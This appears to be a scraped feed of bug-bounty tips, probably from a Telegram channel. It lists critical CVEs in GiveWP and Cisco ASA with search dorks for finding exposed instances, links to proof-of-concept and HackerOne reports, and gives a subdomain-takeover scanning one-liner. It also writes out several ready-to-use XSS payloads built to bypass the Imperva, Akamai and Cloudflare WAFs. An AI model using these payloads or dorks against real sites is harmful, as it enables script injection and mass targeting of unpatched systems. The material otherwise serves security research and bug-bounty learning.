CVE-2024-9634: RCE in GiveWP WordPress Plugin, 9.8 rating
Another critical vulnerability in GiveWP. This time, attackers can inject PHP code using one parameter.
Search at Netlas.io:
Link: https://nt.ls/9tUYx
Dork: http.body:"plugins/give/assets/dist"
Read more: https://github.com/advisories/GHSA-6fx6-wrpf-cpgv
POC for CVE-2024-4577 PHP CGI Argument Injection
Nuclei Template: https://github.com/11whoami99/CVE-2024-4577/blob/main/CVE-2024-4577.yaml
Here are a few good GraphQL reports to learn more about it.
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
HackerOne
Sorare disclosed on HackerOne: Circular based introspetion Query...
## Summary:
Hi Team, Hope you are doing great Sorare graphql Api has introspection enabled by default as per the policy it's meant to be public so they can facilitate their users with Graphql...
Subdomain Takeover POC:
subfinder -d domain | httpx -silent > subdomains.txt ; nuclei -t /root/nuclei-templates/http/takeovers -l subdomains.txt
80% of bug bounties is about understanding the application/framework/protocol (and knowing what exactly you are doing or if it's actually worth doing)
CVE-2024-20329: Improper Neutralization of Command Delimiters in Cisco ASA, 9.9 rating
The vulnerability allows an attacker with low privileges to remotely execute commands via SSH and thus gain full control of the system.
More than 140k instances at Netlas.io:
Link: https://nt.ls/Rfjme
Dork: http.body:"/+CSCOE+/logon.html"
Vendor's advisory: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asa-ssh-rce-gRAuPEUF
Gist
I've analyzed numerous tools, blogs, tweets, and other resources on bypassing 403 Forbidden errors using HTTP Headers Fuzzing techniques. After extensive research, I've compiled a list of headers y...
Found a security vulnerability in any site?
Check if it has a public bug bounty program:
https://xplo1t-sec.github.io/bugbounty-lookup/
#BugBounty #bugbountytips
A solid XSS payload that bypasses Imperva WAF
#infosec #cybersec #bugbountytips
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
Reflected XSS Akamai WAF Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
Cloudflare #XSS WAF Bypass by @nav1n0x
Payload:
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
#cybersec #bugbountytips #infosec
An XSS payload to bypass some WAFs & filters in Firefox
#infosec #cybersec #bugbountytips
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
Retrieves DNS records without any authentication
Replace example.com with the target domain.
curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"
Brut Security pinned «If you're looking for accurate IoT results, then Sign Up On @Netlas https://app.netlas.io/ref/9cc61538/»